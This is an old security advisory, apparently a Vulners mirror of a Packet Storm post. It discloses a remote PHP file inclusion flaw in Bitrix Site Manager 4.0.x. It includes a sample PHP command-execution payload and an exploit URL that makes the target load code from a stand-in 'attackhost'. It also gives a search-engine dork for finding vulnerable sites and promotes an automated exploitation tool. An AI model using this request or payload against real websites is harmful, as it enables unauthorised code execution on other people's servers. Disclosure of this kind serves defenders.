Lucene search
bitrix40xInclusion.txt
ποΈΒ 21 Jun 2005Β 00:00:00Reported byΒ d_bugTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 22Β Views
Critical vulnerability in Bitrix Site Manager allows custom PHP code execution via unfiltered input.
Show more
`Vendor: Bitrix
Product: Bitrix Site Manager 4.0.x
Vulnerability: php including.
Consequence: custom php code execution on server
Risk: Critical
Description:
Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file Β\bitrix\modules\main\start.phpΒ,
hacker can upload php script from other server and execute custom php code on webserver
Send transaction to the server.
Script Example:
<?php
passthru('ls -la');
?>
Transaction should look like http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
ΒattackhostΒ server should contain dbconn.php script in /bitrix/php_interface/ ,
that should be executet on the target server.
Google search: inurl: /bitrix/
Discoveried By D_BuG [email protected]
NemesisSecurityTeam
http://nemesisoftware.com/
CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.
--
Best regards,
D_BuG mailto:[email protected]
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo21 Jun 2005 00:00Current
7.4High risk
Vulners AI Score7.4